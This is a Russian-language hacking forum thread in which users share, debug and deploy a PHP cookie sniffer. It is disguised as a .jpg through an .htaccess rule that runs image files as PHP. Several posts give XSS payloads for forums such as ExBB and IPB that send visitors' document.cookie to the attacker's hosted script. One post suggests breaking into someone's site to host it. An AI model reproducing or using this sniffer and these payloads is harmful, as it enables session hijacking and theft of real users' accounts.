СКАЧАТЬ (http://style-life.biz/onelinetoolz/sn.rar)

Вот мой снифер. Вполне нормальный)))

P.S. Хостинг с поддержкой
php
ftp
.htaccess
Незабудте установить соответствующие chmod для файлов log и me.jpg =) Если вы всёравно ничего непоняли то лучше пользуйтесь античатовским )))

обаНааа.. забыл одно. Со снифером всё понтово. Вот подскажите как установить вывод энного числа последних записей в логе. :D

Вот сн

<?php
$date=date("[D|d/m/Y|H:i]");
$ip=$_SERVER["REMOTE_ADDR"];
$query=$_SERVER["QUERY_STRING"];
$real_ip=getenv("HTTP_X_FORWARDED_FOR");
$otkuda=getenv("HTTP_REFERER");
$browser=getenv("HTTP_USER_AGENT");
$win=getenv("windir");
$fp=fopen("log.html","a");
$mlength=5;
fputs($fp,"<font color=#009900><b>Date:</b> $date</font>\t|$uid|\t<font color=red><b>IP:</b> $ip <b>Real IP(if use proxy):</b>($real_ip)</font><br>\t<font color=red><b>QUERY:</b></font>$query\t<br>$browser\t<br><font color=red><b>REFERER:</b></font>$otkuda\t$win\n<hr color=#666666>");
fclose($fp);
print (" <img src='2.jpg'> ");
?>


Спа... :)

Спасибо, щас попробую твой :)

Блин, большое спассибо!!!
Теперь и в чате со свои сниффером могу сидеть!!!
Классно!

Чето на fatal.ru работать не хочет

Работает он только с IPB
а с ExBB 1.9 отказываеться...

У меня на фатале половина скриптов непашет =) А скажи как ты пихал в эксББ ..

\ExBB 1.9 http://"z=''style='background:url(javascript:document.ima ges[0].src="http:/********.fatal.ru/**/me.jpg?"+document.cookie)'

И на платном хосте тоже не пашет!(

умнда... :) А античатовский пашет?

Там теги [ Img }кудато пропали....
Античатовский пашет и тот который ты тогда давал - он тоже пашет!

всмысле форум патченый получается? :)

не, другой сниффер работает там а этот нет....

Может я права не правильно поставил...так как у тя еа сайте снифер работает...
Log - 777
me.jpg - 777
сама папка 755
и остальное 644
Может на .htaccess другие права нужны?

ща поматрю чё у меня

log 666
me.jpg 644
папка 755

вот такая у меня батва :\

Так, понятно - на фатале работать не будит!(
Есть у меня платный хостинг, поставил я на него и пишет мне:
-"Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@.ru and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request."-
__________________________________________________ ______________________
Что надо вписать в апаче чтоб этого небыло?

Ты не повериш - на самом отстойном хостинге (fatal.ru) эт наконецто заработало!
Только не понятно из за чего ))

8)))) испугался наверно =)

Возвращаюсь с вопросом к программерам =) Обратите внимание на мой пост #2 в этом топике. Как ограничеть кол-во последних записей в логфайле?? =)

Что значит ограничить? Чтобы файл содержал только 10 последних записей?Тогда примерно так
<?
$f1=file($_SERVER['DOCUMENT_ROOT'].'/log.txt');
$f1[]="<font color=#009900><b>Date:</b> $date</font>\t|$uid|\t<font color=red><b>IP:</b> $ip <b>Real IP(if use proxy):</b>($real_ip)</font><br>\t<font color=red><b>QUERY:</b></font>$query\t<br>$browser\t<br><font color=red><b>REFERER:</b></font>$otkuda\t$win\n<hr color=#666666>";
$f2=fopen($_SERVER['DOCUMENT_ROOT'].'/log.txt', 'w');
for($i=count($f1);$i>count($f1)-10;$i--){
fwrite($f2, $f1[$i]."\n");
}
fclose($f);
?>

хмм... Вот что получается

Warning: fwrite(): supplied argument is not a valid stream resource in....

Гдето ошибка. Редактор говорит что тут
начинается...

for($i=count($f1);$i>count($f1)-10;$i--){
fwrite($f2, $f1[$i]."\n");
}
fclose($f);
?>

В общем это непашет =\

<?
$date=date("[D|d/m/Y|H:i]");
$ip=$_SERVER["REMOTE_ADDR"];
$query=$_SERVER["QUERY_STRING"];
$real_ip=getenv("HTTP_X_FORWARDED_FOR");
$otkuda=getenv("HTTP_REFERER");
$browser=getenv("HTTP_USER_AGENT");
$win=getenv("windir");
$f1=file($_SERVER["DOCUMENT_ROOT"]."log.html");
$f1[]="<font color=#009900><b>Date:</b> $date</font>\t|$uid|\t<font color=red><b>IP:</b> $ip <b>Real IP(if use proxy):</b>($real_ip)</font><br>\t<font color=red><b>QUERY:</b></font>$query\t<br>$browser\t<br><font color=red><b>REFERER:</b></font>$otkuda\t$win\n<hr color=#666666>";
$f2=fopen($_SERVER["DOCUMENT_ROOT"]."log.html", "w");
for($i=count($f1);$i>count($f1)-10;$i--)
{
fwrite ($f2, $f1[$i]."\n");
}
fclose ($f);
print (" <img src='2.jpg'> ");
?>

Не
$f1=file($_SERVER["DOCUMENT_ROOT"]."log.html");
а
$f1=file($_SERVER["DOCUMENT_ROOT"]."/log.html");

и вообще в следующий раз хоть ошибку выкинь =)

fclose($f); -- это тоже неправильно :) fclose($f2); -- это правильно :) И оказывается надо указать путь к лог файлу относительно коренного каталога сайта... :eek:
Но выводит одну последнюю запись.
Теперь вот что получилось и без ошибок:

<?
// переменные пропускаю
$f1=file($_SERVER["DOCUMENT_ROOT"]."/onelinetoolz/sn/log.html");
$f1[]="<font color=#009900><b>Date:</b> $date</font>\t|$uid|\t<font color=red><b>IP:</b> $ip <b>Real IP(if use proxy):</b>($real_ip)</font><br>\t<font color=red><b>QUERY:</b></font>$query\t<br>$browser\t<br><font color=red><b>REFERER:</b></font>$otkuda\t$win\n<hr color=#666666>";
$f2=fopen($_SERVER["DOCUMENT_ROOT"]."/onelinetoolz/sn/log.html", "w");
for($i=count($f1);$i>count($f1)-10;$i--)
{
fwrite ($f2, $f1[$i]."\n");
}
fclose($f2);
print (" <img src='2.jpg'> ");
?>

А в картинку этот код переделать можно или нет?

дык для этого там файл и есть .htaccess который интерпретирует картинку как скрипт php :)

В чате SP CHAT - php картинка не работатет....

Ну тоесть этот код:
\x3cimg src="http\x3a//******.fatal.ru/*****me.php" name="imaga"\x3e
перестает работать если формать файла будит php...

ненадо me.php переименуй в me.jpg и всёравно будет пахать =) Всё дело в .htaccess :) Если поддержка на хостинге есть то ок всё. Меняй смело расширение :)

Fatal.ru - бесит!!!!!!
arning: file(): Unable to access /www/onelinetoolz/sn/log.html in /www2/s/sa/salogta.fatal.ru/site/sniffer/me.jpg on line 3
Warning: file(/www/onelinetoolz/sn/log.html): failed to open stream: No such file or directory in /www2/s/sa/salogta.fatal.ru/site/sniffer/me.jpg on line 3
Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 73095 is not allowed to access /www owned by uid 0 in /www2/s/sa/salogta.fatal.ru/site/sniffer/me.jpg on line 5
Warning: fopen(/www/site/sniffer/log.html): failed to open stream: No such file or directory in /www2/s/sa/salogta.fatal.ru/site/sniffer/me.jpg on line 5
Warning: fwrite(): supplied argument is not a valid stream resource in /www2/s/sa/salogta.fatal.ru/site/sniffer/me.jpg on line 8
Warning: fwrite(): supplied argument is not a valid stream resource in /www2/s/sa/salogta.fatal.ru/site/sniffer/me.jpg on line 8
Warning: fwrite(): supplied argument is not a valid stream resource in /www2/s/sa/salogta.fatal.ru/site/sniffer/me.jpg on line 8
Warning: fwrite(): supplied argument is not a valid stream resource in /www2/s/sa/salogta.fatal.ru/site/sniffer/me.jpg on line 8
Warning: fwrite(): supplied argument is not a valid stream resource in /www2/s/sa/salogta.fatal.ru/site/sniffer/me.jpg on line 8
Warning: fwrite(): supplied argument is not a valid stream resource in /www2/s/sa/salogta.fatal.ru/site/sniffer/me.jpg on line 8
Warning: fwrite(): supplied argument is not a valid stream resource in /www2/s/sa/salogta.fatal.ru/site/sniffer/me.jpg on line 8
Warning: fwrite(): supplied argument is not a valid stream resource in /www2/s/sa/salogta.fatal.ru/site/sniffer/me.jpg on line 8
Warning: fwrite(): supplied argument is not a valid stream resource in /www2/s/sa/salogta.fatal.ru/site/sniffer/me.jpg on line 8
Warning: fwrite(): supplied argument is not a valid stream resource in /www2/s/sa/salogta.fatal.ru/site/sniffer/me.jpg on line 8
Warning: fclose(): supplied argument is not a valid stream resource in /www2/s/sa/salogta.fatal.ru/site/sniffer/me.jpg on line 10

заваливайся ко мне в аську :)

Епта =) rsha1988 =) chmod 0666 log.html =)))

Епта а у меня так снифер и ламирит вместе сомной. только последнй 1 выводит. ;)

Мужики... ! Херовато получается =) Каждая запись ложится поверх (затирая) предыдущей. т.е. в логах остаётся только одна последняя... я незнаю чё делать. Я наверно достал =).

Блин, ну сделай вместо
$f2=fopen($_SERVER["DOCUMENT_ROOT"]."/onelinetoolz/sn/log.html", "w");
for($i=count($f1);$i>count($f1)-10;$i--)
{
fwrite ($f2, $f1[$i]."\n");
}
так например. Неужели самому сложно додуматься
$f2=fopen($_SERVER["DOCUMENT_ROOT"]."/onelinetoolz/sn/log.html", "w");
for($i=count($f1);$i>count($f1)-10;$i--) {
$f3=$f3."\n".$f1[$i];
}
fwrite ($f2, $f3."\n");

(-=util=-), спасибо тебе большооооое за сниффер! =)
Кстати уже есть возможность выборочного удаления?

Когда открываешь файл, то делай не W а а+ тогда затирать не будет...

2 sosk4
Умник, сказано же, нужно оставлять только 10 последних. И причем тут 'a+'? Ты сущность символа '+' после 'a' знаешь?

Народ скажите как устанавливаеться сниффер

просто скинуть sn в корневую дерикторию?

www.ХОСТ.ru/sn/index.html

поменять строку

print (" <img src='2.jpg'> ");

на

print (" <img src='www.ХОСТ.ru/2.jpg'> ");

и все?

а Xss будет

[ Email=mailto:assss@wew.ew ]sssssss (s as='s@wew.ew)[/EMAIL]' style='background:url(javaSCript:document.images[1].scr="http://www.ХОСТ.ru/sn/me.jpg?k:"+document.cookie)'

привет вот загрузил файлы
1).htaccess
2)index
3)log
4)style
на
sniffer2005.narod.ru
а me.jpg в папку sniffer2005.narod.ru/cgi-bin

вопшем
log находется здес : sniffer2005.narod.ru/log.html
и me.jpg здесь :sniffer2005.narod.ru/cgi-bin/me.jpg

http://000.aa/=`image.jpg[/img]]` style=background:url(javascript:document.images[12].src="http://sniffer2005.narod.ru/cgi-bin/me.jpg?"+document.cookie)


НЕ РАБОТАЕТ :confused:
ЧЕ НАДО ИСПРАВИТ ГДЕ И КАК
ЗАРАНЕЕ СПАСИБО

Чувак - ты типо супер мега хаккер!
Яб до такого не додумался чтоб на narod.ru загрузить сниффер....
Там же php и хашет не поддерживаеться....

блин зачем же ты тайну раскрыл =)
больше всего прикалывает директория sniffer2005.narod.ru/cgi-bin :D :D

Ладно (-=util=-), в следующий раз буду врать что чубрик что то не правильно поставил)))

ну ладно вам ребята :D
a web-space.tv пойдет?
если да то че дальше?тока серезна :rolleyes:
thank

Если там это все поддерживаеться то пойдет!
А луше всего платный хостинг (хотя у меня сниффер не один там не работает(()
Или взломай чей нибйть сайт который находиться на хосте fata.ru и установи там...))

спасибо за ответ
и еще если я загружу все файлыто
http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[1].src="http://MY_SITE/s.jpg?"+document.cookie) будет работат?не чего не надо изменят в этих файлах ?например в log.html или в .htccess?
просто надо загрузит файлы и фсе?
пожалуйста отвечайте честно
СПАСИБО

Сперва найди хостинг. Залей файлы. попробуй произвести XSS атаку. Потом у тебя возникнут некоторые проблемы. И их ты изложешь. И прочитай внимательно первый топик тут http://forum.antichat.ru/showthread.php?t=5505

Сперва найди хостинг. Залей файлы. попробуй произвести XSS атаку. Потом у тебя возникнут некоторые проблемы. И их ты изложешь. И прочитай внимательно первый топик тут http://forum.antichat.ru/showthread.php?t=5505


спасибо файлы надо залит в одну и тоже папку?
посмотри вот че получилась
http://web-space.tv/hacking/log.html
все файлы лежат в корневой папке
вот толька в .htaccess зделал вот так (как написано в читай мыняяяяяя
htaccess выглядет вот так


AddType application/x-httpd-php .jpg
log.html - 666
me.jpg - 666

правильно или нет?
СПАСИБО

Ну я поставил этот снифер на агаве.
Всё пашет.
И что он кроме ай пи адреса и реферы ничего не показывает??

Куки
OC
User agent
и т.д.
+ строка Query. :) Ты попробуй на ipb'шке какойнить вперва.

Так то оно всё так:)Но как картинка он пахать не будет...Выводить надо подругому:)))

У меня он работает с расширением jpg ! Не надо гнать!

Всё работает, я сперва делал на h15.ru - не работало. Щас залил на платный - всё работает отлично.

h*.ru гонит адско.

Всё работает, я сперва делал на h15.ru - не работало. Щас залил на платный - всё работает отлично.
А у меня на плтном хосте не хочет пахать...
Только на fatal.ru заработало.
Как отредактирывать апачь? :confused:

Гы. Вроде нечего ненадо редактировать :) Главное правильно чмоды поставить ;)

Через скрипт можно,а просто как картинку нет!Попробуй в этот форум вставмть...

С позволения модераторов и администраторов этого форума, предлагаю перенести обсуждения этого сниффера - да и всех остальных снифферов - сюда: http://forum.antichat.ru/showthread.php?t=5568 так как в том топике описаны новые его возможности.